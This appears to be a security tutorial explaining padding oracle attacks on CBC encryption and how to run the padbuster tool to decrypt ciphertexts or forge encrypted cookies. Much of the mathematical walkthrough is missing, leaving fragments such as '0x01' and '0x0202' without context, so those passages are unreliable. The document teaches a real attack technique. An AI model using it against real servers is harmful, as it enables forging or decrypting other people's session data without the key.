A padding oracle attack abuses padding validation information in order to decrypt an arbitrary message. In order for it to work, it requires a padding oracle. A padding oracle is any system which, given a ciphertext, behaves differently depending on whether the decrypted plaintext has valid padding or not. For the sake of simplicity, you can think of it as a sending an arbitrary ciphertext to a server and it returning "Success" when the corresponding plaintext has valid padding, and spitting out "Failure" otherwise. Note that the ciphertexts you query the oracle with need not have meaningful plaintexts behind them and you will not even be generating them by encryption, but rather crafting them in a custom manner in order to exploit the information from the oracle.
Let's remind ourselves of how CBC decryption works by taking a simplified look at the last two blocks:
The last ciphertext
Now, let's imagine a second scenario, where 0x01
.
Since, we didn't change 0x01
to obtain the value of
Since 0x0202
.
We already know 0x01
with each new block.
Apart from allowing you to decrypt a ciphertext, an oracle padding vulnerability can allow you to encrypt (almost) any plaintext. This could be useful for example when you need to encrypt a plaintext cookie to a ciphertext in order to use it, but you don't have the key.
First of all you will need to choose the plaintext you want to encrypt, 0x0808080808080808
).
We now XOR these together to obtain
padbuster
padbuster
is a tool written in Perl which is designed to automate padding oracle attacks. It is included in Kali Linux, but you can also find it at https://github.com/AonCyberLabs/PadBuster.
Its syntax is fairly simple. You need to first provide it with the URL of the padding oracle, then you need to give it the ciphertext and finally provide it with the block size. Next are any command-line arguments you might wish to use. If you don't provide padbuster
with an error string through -error
, it will perform response analysis and prompt you to select which response is the error one. For example, I have a padding oracle which displays either "Success!" or "Fail!" on the response page. As you see, though, padbuster
's response analysis automatically picked up on that and asked me which response is the error.
You might also need to change the encoding that padbuster
uses, depending on the how the padding oracle accepts data. Here, -encoding 1
means that I want the requests to include the malicious ciphertexts representing hex bytes as lowercase ASCII characters. The -noiv
flag tells padbuster
that the provided ciphertext does NOT include an IV. If you skip it, the first ciphertext block will be treated as the IV and won't be decrypted.
After you give it the correct error response, it will perform the attack and decrypt your ciphertext.
Furthermore, padbuster
is capable of encrypting a plaintext by mounting a reverse padding oracle attack. This is done through the -plaintext [plaintext]
flag:
Unfortunately, if you don't know the IV, the last block will decrypt to garbage:
Note, in the above screenshot the hex is actually the decrypted version of the ciphertext generated by padbuster.